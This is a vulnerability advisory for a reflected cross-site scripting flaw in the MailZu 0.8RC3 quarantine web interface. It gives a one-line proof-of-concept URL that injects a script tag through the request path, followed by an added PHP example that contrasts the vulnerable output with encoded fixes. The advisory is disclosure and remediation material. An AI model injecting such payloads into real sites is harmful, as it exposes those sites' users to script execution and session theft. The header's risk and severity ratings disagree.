MailZu 0.8RC3 Cross Site Scripting

Published: 2017.01.19
Credit:    Nassim Asrir
Risk:      Low
CWE:       CWE-79
CVE:       N/A
Local:     No
Remote:    Yes

[+]###################################################################################################
[+] Title: MailZu 0.8RC3 - Reflected Cross Site Scripting
[+] Credits / Discovery: Nassim Asrir
[+] Author Email: wassline@gmail.com
[+] Author Company: Henceforth
[+]###################################################################################################



Vendor:
===============
https://sourceforge.net/


Product:
===============
MailZu 0.8RC3


Download:
===========
https://sourceforge.net/projects/mailzu/files/mailzu/


MailZu is a simple and intuitive web interface to manage Amavisd-new quarantine. Users can view their own quarantine, release/delete messages or request the release of messages.


Vulnerability Type:
======================================
Reflected Cross Site Scripting.



CVE Reference:
===============
N/A




Tested on:
===============
Windows 7
Apache/2.4.23 (Win64)




Exploit/POC:
============

1) Navigate to the server: http://server/index.php


2) Inject the XSS payload into the path: http://server/index.php/"><script>alert(1);</script>


3) Done!
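The reflection the PoC relies on, shown as an added PHP example that is not MailZu's own code: it assumes (an assumption, not stated in the advisory) that the request path, which PHP exposes as $_SERVER['PHP_SELF'] (script name plus the trailing PATH_INFO segment), is written into an HTML attribute without encoding. That is the usual reason a payload placed after index.php/ comes back in the page. The vulnerable pattern is shown beside two fixes, and the sample input is the advisory's own payload, embedded as a constant so the script runs from the CLI without a web server.

```php
<?php
// Added example (not MailZu's code). Assumption: the request path, exposed by
// PHP as $_SERVER['PHP_SELF'] (script name plus PATH_INFO), is written into an
// HTML attribute without encoding. The advisory does not name the exact sink.

declare(strict_types=1);

// Constructed sample input: what PHP_SELF carries for the advisory's request
// http://server/index.php/"><script>alert(1);</script>
const SAMPLE_PHP_SELF = '/index.php/"><script>alert(1);</script>';

// Vulnerable pattern (CWE-79): the path is interpolated verbatim, so the quote
// closes the attribute and the rest of the path is parsed as a script tag.
function vulnerableFormTag(string $phpSelf): string
{
    return '<form method="post" action="' . $phpSelf . '">';
}

// Fix 1: encode for the attribute context. ENT_QUOTES covers both " and ',
// so the value cannot terminate the attribute; < and > are encoded as well.
function encodedFormTag(string $phpSelf): string
{
    $safe = htmlspecialchars($phpSelf, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<form method="post" action="' . $safe . '">';
}

// Fix 2: do not reflect PATH_INFO at all. SCRIPT_NAME is the script path only
// (no user-controlled trailing segment); it is still encoded as a precaution.
function scriptNameFormTag(string $scriptName): string
{
    $safe = htmlspecialchars($scriptName, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<form method="post" action="' . $safe . '">';
}

// Check used for the comparison below: true when the attribute value still
// contains a character that can break out of a double-quoted attribute.
function breaksOutOfAttribute(string $attributeValue): bool
{
    return strpbrk($attributeValue, '"<>') !== false;
}

$encodedValue = htmlspecialchars(SAMPLE_PHP_SELF, ENT_QUOTES | ENT_HTML5, 'UTF-8');

echo 'Vulnerable:   ' . vulnerableFormTag(SAMPLE_PHP_SELF) . PHP_EOL;
echo 'Encoded:      ' . encodedFormTag(SAMPLE_PHP_SELF) . PHP_EOL;
echo 'No PATH_INFO: ' . scriptNameFormTag('/index.php') . PHP_EOL;
echo 'Raw value breaks out of the attribute:     '
    . (breaksOutOfAttribute(SAMPLE_PHP_SELF) ? 'yes' : 'no') . PHP_EOL;
echo 'Encoded value breaks out of the attribute: '
    . (breaksOutOfAttribute($encodedValue) ? 'yes' : 'no') . PHP_EOL;
```

Run it with `php example.php`. The vulnerable line prints a form tag whose action attribute ends at the payload's first quote, followed by a live script tag; the encoded line keeps the whole path inside the attribute as `&quot;&gt;&lt;script&gt;...`, and the check reports that only the raw value can break out. Encoding at the sink is the fix that matters for CWE-79; dropping PATH_INFO from the action is a defence in depth that also removes the reflected value entirely.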



Network Access:
===============
Remote



Impact:
=================
Execute malicious scripts



Severity:
===========
High


Disclosure Timeline:
=====================
January 18, 2017: Public Disclosure





Copyright 2017, cxsecurity.com